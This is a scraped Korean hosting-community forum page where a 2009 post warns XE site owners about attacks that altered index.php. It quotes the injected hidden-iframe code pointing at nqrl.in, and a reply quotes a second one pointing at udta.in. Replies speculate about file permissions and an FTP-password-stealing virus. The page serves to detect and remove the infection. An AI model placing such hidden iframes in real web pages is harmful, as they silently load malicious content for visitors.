techus qrcode
MEMBER LOGIN

  • Server : Sulinux 2.0
  • Apache/2.0.64 (unix)
  • PHP version 5.2.17
  • Mysql 5.0.92
  • 1차: ns1.techus.net (211.232.13.7)
  • 2차: ns2.techus.net (211.232.13.3)
  • 현재 네임서버 제공 안합니다.
  • 네임서버는 도메인관리업체에서
  • 제공하는 네임서버로 하시고
  • 레코드관리 A : 211.232.13.7 로
  • 설정 하세요.감사합니다.

DNS Powered by DNSEver.com
  • MySQL DB 연결설정 ( http://www.ausangel.org/bbs/

    MySQL DB 연결설정 ( http~

  • 게시글 글등록시 관리자 네이트온으로 알림

    게시글 글등록시 관~

  • 게시판 글등록시 관리자 마이피플로 알림

    게시판 글등록시 관~

  • 선생님 설명입니다..^^

    선생님 설명입니다..^~

  • 테크 모바일을 위한 크롬

    테크 모바일을 위한 ~

  • 3단CSS메뉴 플러그인(멋쟁이님 삽질 빌더용) ”

    3단CSS메뉴 플러그인(~

  1. 1. 뭇쏘 509,500
  2. 2. 아이케 268,835
  3. 3. 예랑맨 182,270
  4. 4. bluewolf 163,255
  5. 5. 청주산의 154,415
  6. 6. 이규하 148,225
  7. 7. 아이슬 119,730
  8. 8. 선장 112,365
  9. 9. 조나단 105,110
  10. 10. SDK 98,895
  1. 1. 청주산의 3346
  2. 2. 아이케 2823
  3. 3. 예랑맨 1611
  4. 4. SDK 1027
  5. 5. 이규하 951
  6. 6. 늑대소냐 726
  7. 7. bluewolf 495
  8. 8. 컴퓨터나라 385
  9. 9. 아이슬 345
  10. 10. 어우름 282
  1. jkwon ♂ 12/27
  2. angel ♂ 12/19
  3. isaac ♂ 5/26
  4. 랩퍼투혼 ♂ 11/24
  5. 노톨릭 ♂ 9/23
  6. wertetrrt ♀ 4/9
  7. 레드 ♂ 3/31
  8. medipara ♂ 3/11
  9. 밥통 ♂ 4/16
  10. 우짜맨 ♂ 1/16
자유게시판 메인 » 자유게시판 » XE 쓰시는분 꼭 읽어주세요!!
 
추천:0 조회:2856

title XE 쓰시는분 꼭 읽어주세요!! [7]

2009-08-07 (금) 22:41 우암 (IP:114.xxx.32)

아이유홀릭 (iuholic.com)이 여러차례 접속이 안되는 문제가 발생했습니다.
사실 청주산의 선생님 도움이 아니였으면 문제도 찾지 못했을뻔 했습니다.;;;;
XE 취약점을 이용한 해킹이 이루어지고 있다고합니다.
제로보드 홈페이지에 올라온 다른 분들 사례로 FTP 접속이 해외에서 이루어지고 index.php 파일이 수정된 기록을 확인했다고 합니다.

홀릭 역시
index.php 파일 하단에
<iframe src="http://nqrl.in:8080/index.php" width=114 height=159 style="visibility: hidden"></iframe>
라는 문구가 3번정도 자동입력되어 접속이 안됬습니다;;
현재 XE에는 이런 사례가 보고된 글들이 몇건씩 올라오고 있구요.
보안패치가 나오지 않으면, 계속해서 위같은 문제가 발생할 것 같습니다.
홈페이지 운영중 접속이 안되시는분은 제일 먼저 index.php 파일을 확인해 보시구요.
소용이 있을지는 모르겠지만, FTP 비밀번호도 수시로 바꿔주는것도 예방 방법중 하나입니다..
index.php침투를 하도 많이 당해서 이제는 귀찮아지네요;;;
어서빨리 취약점 보안 패치가 올라와야 할텐데요...
no character
우암
반갑습니다.
댓글 7개

이름아이콘 청주산의

에궁, 그런 문제가... 09.08.07 23:08

   

이름아이콘 온라

index.php 파일을 644 로 권한을 만들면 접속이 되나요!~^^

제가 회사라.. 확인을 안해봤지만..

그렇게 하면 취약점을 보완할수도 있을거 같은데...???

테스트를 못해봐서리.. 회사는 FTP 를 막아놔서리..ㅋㅋ 09.08.08 00:41

   

이름아이콘 온라

또는 655로는 접속이 가능할지... 아 낼 집에가면 함 테스트 해봐야 겠네요!~~

외국의 툴같은경우는 뭐 물론 설치시에는 707해야겠지만... 나중에 설치후에 보안문제등의 이유로

655나 644등으로 변경하는거 같던데..?? 09.08.08 01:01

   

이름아이콘 NeverOut

회원캐릭터

<iframe src="http://udta.in:8080/index.php" width=188 height=180 style="visibility: hidden"></iframe>
저도 확인해보니 있군요....  얼릉 지워버렸습니다~
지금 권한도 644로 되어 있네요.... 09.08.08 05:12

   

이름아이콘 온라

음... 그렇게 해도 그게 입력이 되는군요... 무셔운거군...^^ 09.08.08 10:02

   

이름아이콘 아이케

네버아웃님은 테크쓰시지 않나요?
테크도 걸리나...;; 09.08.08 11:00

   

이름아이콘 온라

제노바이러스 인걸로 나오네요~^^  일단은 PC 보안문제로 FTP 의 아이디와 비번이 뚤리니.. 당연히..

644 해도 그런현상이 발생하는거 같네요~~ 제노바이러스 체크하시길..^^ 09.08.08 11:09

   

0/3500 secret 파일첨부
FILE #1 .
FILE #2 .
FILE #3 .
FILE #4 .
FILE #5 .
FILE #6 .
FILE #7 .
FILE #8 .
FILE #9 .
FILE #10 .
다중선택옵션 번호 제목 글쓴이 날짜 조회
2172 베네치아 수상도시에서 [2] name icon 청주산의 04-20 (일) 61357
2171 카푸리섬에서 [1] name icon 청주산의 04-19 (토) 59641
2170 오늘은 울프님의 날~~ ^^ [8] name icon 예랑맨 01-25 (수) 41790
2169 Re..테커스서버 사양(요건 글씨) [5]+4 청주산의 06-29 (월) 41492
2168 2014년 대박나세요~ [4] name icon 예랑맨 12-29 (일) 40636
2167 프랑스에서 [4] name icon 청주산의 04-13 (일) 40114
2166 paper camera를 소개합니다 [1] name icon 예랑맨 03-01 (토) 39582
2165 선생님 감사합니다. phpmyadmin 이 업글이 되었네요 [2]+1 name icon 선장 03-18 (화) 39476
2164 새벽 눈발 속에도 [1]+1 name icon 예랑맨 12-11 (수) 37676
2163 테커스 네임서버 로그파일을 보니 [2]+1 name icon 청주산의 04-03 (목) 36920
2162 갤럭시탭 개통일 및 밧데리 삼성것 확인법 [3]+2 name icon 청주산의 01-21 (토) 36575
2161 새벽에 응급실에. .. [7]+2 name icon 예랑맨 04-25 (목) 36088
2160 황정순 할머니를 아시나요? [3] name icon 청주산의 02-18 (화) 35730
2159 바꾼 갤럭시 S2 [5]+2 name icon 청주산의 04-19 (목) 35433
2158 모토로이에 cm7 올리기 [4]+2 name icon 청주산의 01-26 (목) 34618
2157 카톡 아이디 등록하기 [3] name icon 청주산의 06-09 (목) 34195
2156 내 정보가 이상해요.. [3] name icon 예랑맨 12-13 (화) 33746
2155 세상이 좋아졌네요; [4]+1 아이케 11-23 (화) 33520
2154 모바일로 자동 전화걸기 완벽자료 [3] name icon 예랑맨 05-18 (수) 33504
2153 슬라이드 밀 [2] name icon 어우름 05-18 (수) 33324